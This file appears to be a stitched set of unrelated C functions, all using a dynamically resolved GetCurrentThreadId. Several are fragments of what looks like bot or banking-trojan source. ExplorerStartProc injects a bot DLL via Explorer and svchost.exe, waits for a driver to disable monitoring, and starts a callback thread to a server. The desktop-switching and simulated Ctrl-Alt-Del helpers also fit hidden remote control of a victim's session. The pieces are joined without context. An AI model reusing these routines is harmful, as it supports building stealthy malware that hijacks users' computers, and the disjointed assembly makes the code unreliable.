BOOL SelectHDESK(HDESK new_desktop) { typedef DWORD (WINAPI *GetCurrentThreadIdT)( VOID ); GetCurrentThreadIdT pGetCurrentThreadId=(GetCurrentThreadIdT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentThreadId"); typedef HDESK (WINAPI *GetThreadDesktopT)( __in DWORD dwThreadId); GetThreadDesktopT pGetThreadDesktop=(GetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"GetThreadDesktop"); typedef BOOL (WINAPI *GetUserObjectInformationAT)( __in HANDLE hObj, __in int nIndex, __out_bcount_opt(nLength) PVOID pvInfo, __in DWORD nLength, __out_opt LPDWORD lpnLengthNeeded); GetUserObjectInformationAT pGetUserObjectInformationA=(GetUserObjectInformationAT)GetProcAddress(LoadLibrary("USER32.dll"),"GetUserObjectInformationA"); typedef BOOL (WINAPI *SetThreadDesktopT)( __in HDESK hDesktop); SetThreadDesktopT pSetThreadDesktop=(SetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"SetThreadDesktop"); typedef BOOL (WINAPI *CloseDesktopT)( __in HDESK hDesktop); CloseDesktopT pCloseDesktop=(CloseDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"CloseDesktop"); HDESK old_desktop = pGetThreadDesktop(pGetCurrentThreadId()); DWORD dummy; char new_name[256]; if (!pGetUserObjectInformationA(new_desktop, UOI_NAME, &new_name, 256, &dummy)) { return FALSE; } // Switch the desktop if(!pSetThreadDesktop(new_desktop)) { return FALSE; } // Switched successfully - destroy the old desktop pCloseDesktop(old_desktop); return TRUE; }
int pthread_join(pthread_t thread, void** valuePtr) { if (valuePtr) printf("valuePtr != NULL\n"); struct pthread_queue entry; struct pthread_queue* head; /* Check if it is already on the thread list. */ if (!pCheckThreadList(thread)) return 0; while (1) { /* Add to the join list. */ pthread_mutex_lock(&joinMutex); head = joinList; entry.threadId = pGetCurrentThreadId(); entry.next = NULL; printf("waiting for %d\n", thread); if (!head) { joinList = &entry; }else{ while (head->next) head = head->next; head->next = &entry; } pthread_mutex_unlock(&joinMutex); SysSuspendThread(pGetCurrentThreadId()); if (!pCheckThreadList(thread)) break; } pthread_mutex_lock(&joinMutex); pthread_mutex_unlock(&joinMutex); return 0; }
void InitializeHandlersList() { // Инициализацию списка перехватчиков производим в случае если // он не создал либо создан в другом процессе HANDLE TID = (HANDLE)pGetCurrentThreadId(); if (SendDataHandlers == NULL || SendHandlersTID != TID) { SendDataHandlers = List::Create(); List::SetFreeItemMehod(SendDataHandlers, DestroyDataHandler); SendHandlersTID = TID; } }
DWORD WINAPI ExplorerStartProc(LPVOID Data) { LDRDBG("BRDS", "Зупущена функция Эксплорера "); if (Data == NULL) { LDRDBG("BRDS Explorer", "Ошибочные данные для работы в эксплорере "); return 0; } // 302_ld запуск в Explorer (тут сети может не быть) DebugReportStepByName("302_ld"); // Запускаем поток в svchost отзвона на тестовый сервер StartThread(DbgRptExplorerThread, NULL); PUSER_INIT_NOTIFY InitData = (PUSER_INIT_NOTIFY)Data; LDRDBG("BRDS Explorer", "Ожидаем пока драйвер отключит слежение за процессоь svchost.exe "); while (CheckIsInjectToProcess(InitData, SVChostName)) pSleep(300); LDRDBG("BRDS Explorer", "Запуск потока Эксплорера "); // Первым делом пытаемся запустить длл из файла if (DoStartBotDll(InitData, 5000)) { LDRDBG("BRDS Explorer", "Бот успешно загружен из кэша "); return 0; } // Регистрируем событие обратной связи LDRDBG("BRDS Explorer", "Регистрируем метод обратной связи в процессе Explorer "); if (!DriverRegisterGlobalCallback(InitData, (DWORD)pGetCurrentThreadId(), StartBotDll, NULL)) { LDRDBG("BRDS Explorer", "Ошибка регистрации метода обратной свзи експлорера "); return 0; } // Запускаем бесконечный цикл ожидания do { pSleepEx(10000, TRUE); }while(1); return 0; }
int pthread_cond_wait(pthread_cond_t* cond, pthread_mutex_t* mutex) { struct pthread_queue entry; struct pthread_queue* last=cond->list; int threadId; threadId = pGetCurrentThreadId(); if (mutex->owner != threadId) return EINVAL; if (cond->signal == PTHREAD_COND_SIGNAL) { cond->signal = PTHREAD_COND_INITIAL; return 0; } entry.threadId=threadId; entry.next=NULL; pthread_mutex_lock(&cond->mutex); if (!last) { cond->list=&entry; }else{ while (last->next) last=last->next; last->next=&entry; } pthread_mutex_unlock(&cond->mutex); pthread_mutex_unlock(mutex); while (cond->signal != PTHREAD_COND_SIGNAL) if (SysSuspendThread(threadId)) return -1; pthread_mutex_lock(mutex); cond->signal = PTHREAD_COND_INITIAL; return 0; }
BOOL SimulateCtrlAltDel() { typedef DWORD (WINAPI *GetCurrentThreadIdT)( VOID ); GetCurrentThreadIdT pGetCurrentThreadId=(GetCurrentThreadIdT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentThreadId"); typedef HDESK (WINAPI *GetThreadDesktopT)( __in DWORD dwThreadId); GetThreadDesktopT pGetThreadDesktop=(GetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"GetThreadDesktop"); typedef BOOL (WINAPI *PostMessageAT)( __in_opt HWND hWnd, __in UINT Msg, __in WPARAM wParam, __in LPARAM lParam); PostMessageAT pPostMessageA=(PostMessageAT)GetProcAddress(LoadLibrary("USER32.dll"),"PostMessageA"); HDESK old_desktop = pGetThreadDesktop(pGetCurrentThreadId()); // Switch into the Winlogon desktop if (!SelectDesktop("Winlogon")) { return FALSE; } // Fake a hotkey event to any windows we find there.... :( // Winlogon uses hotkeys to trap Ctrl-Alt-Del... pPostMessageA(HWND_BROADCAST, WM_HOTKEY, 0, MAKELONG(MOD_ALT | MOD_CONTROL, VK_DELETE)); // Switch back to our original desktop if (old_desktop != NULL) SelectHDESK(old_desktop); return TRUE; }
bool SwitchInputDesktop() { typedef DWORD (WINAPI *GetCurrentThreadIdT)( VOID ); GetCurrentThreadIdT pGetCurrentThreadId=(GetCurrentThreadIdT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GetCurrentThreadId"); typedef HDESK (WINAPI *GetThreadDesktopT)( __in DWORD dwThreadId); GetThreadDesktopT pGetThreadDesktop=(GetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"GetThreadDesktop"); typedef BOOL (WINAPI *GetUserObjectInformationAT)( __in HANDLE hObj, __in int nIndex, __out_bcount_opt(nLength) PVOID pvInfo, __in DWORD nLength, __out_opt LPDWORD lpnLengthNeeded); GetUserObjectInformationAT pGetUserObjectInformationA=(GetUserObjectInformationAT)GetProcAddress(LoadLibrary("USER32.dll"),"GetUserObjectInformationA"); typedef BOOL (WINAPI *SetThreadDesktopT)( __in HDESK hDesktop); SetThreadDesktopT pSetThreadDesktop=(SetThreadDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"SetThreadDesktop"); typedef HDESK (WINAPI *OpenInputDesktopT)( __in DWORD dwFlags, __in BOOL fInherit, __in ACCESS_MASK dwDesiredAccess); OpenInputDesktopT pOpenInputDesktop=(OpenInputDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"OpenInputDesktop"); typedef BOOL (WINAPI *CloseDesktopT)( __in HDESK hDesktop); CloseDesktopT pCloseDesktop=(CloseDesktopT)GetProcAddress(LoadLibrary("USER32.dll"),"CloseDesktop"); typedef int (WINAPI *lstrcmpAT)( __in LPCSTR lpString1, __in LPCSTR lpString2 ); lstrcmpAT plstrcmpA=(lstrcmpAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"lstrcmpA"); BOOL bRet = false; DWORD dwLengthNeeded; HDESK hOldDesktop, hNewDesktop; char strCurrentDesktop[256], strInputDesktop[256]; hOldDesktop = pGetThreadDesktop(pGetCurrentThreadId()); memset(strCurrentDesktop, 0, sizeof(strCurrentDesktop)); pGetUserObjectInformationA(hOldDesktop, UOI_NAME, &strCurrentDesktop, sizeof(strCurrentDesktop), &dwLengthNeeded); hNewDesktop = pOpenInputDesktop(0, FALSE, MAXIMUM_ALLOWED); memset(strInputDesktop, 0, sizeof(strInputDesktop)); pGetUserObjectInformationA(hNewDesktop, UOI_NAME, &strInputDesktop, sizeof(strInputDesktop), &dwLengthNeeded); if (plstrcmpA(strInputDesktop, strCurrentDesktop) != 0) { pSetThreadDesktop(hNewDesktop); bRet = true; } pCloseDesktop(hOldDesktop); pCloseDesktop(hNewDesktop); return bRet; }
static void pthread_start(void* arg) { struct pthreadArgs* pArgs=(struct pthreadArgs*)arg; void* (*start)(void*) = pArgs->startRoutine; void* args = pArgs->args; struct pthread_queue entry; struct pthread_queue* head; DlTlsCreateContext(); entry.threadId = pGetCurrentThreadId(); entry.next = NULL; pthread_mutex_lock(&listMutex); head = threadList; while (head->next) head = head->next; head->next = &entry; pthread_mutex_unlock(&listMutex); pthread_cond_signal(pArgs->signal); start(args); /* Remove ourselves from the thread list. */ pthread_mutex_lock(&listMutex); head = threadList; while (head->next && head->next != &entry) head = head->next; if (head->next) head->next = head->next->next; pthread_mutex_unlock(&listMutex); /* Wake up and remove everything in the join list. */ pthread_mutex_lock(&joinMutex); head = joinList; joinList = NULL; while (head) { SysResumeThread(head->threadId); head = head->next; } pthread_mutex_unlock(&joinMutex); /* Actually exit the thread. We used to be able to return onto a frame * set up by the kernel, but that no longer happens. */ SysExitThread(-1); }
pthread_t pthread_self(void) { return pGetCurrentThreadId(); }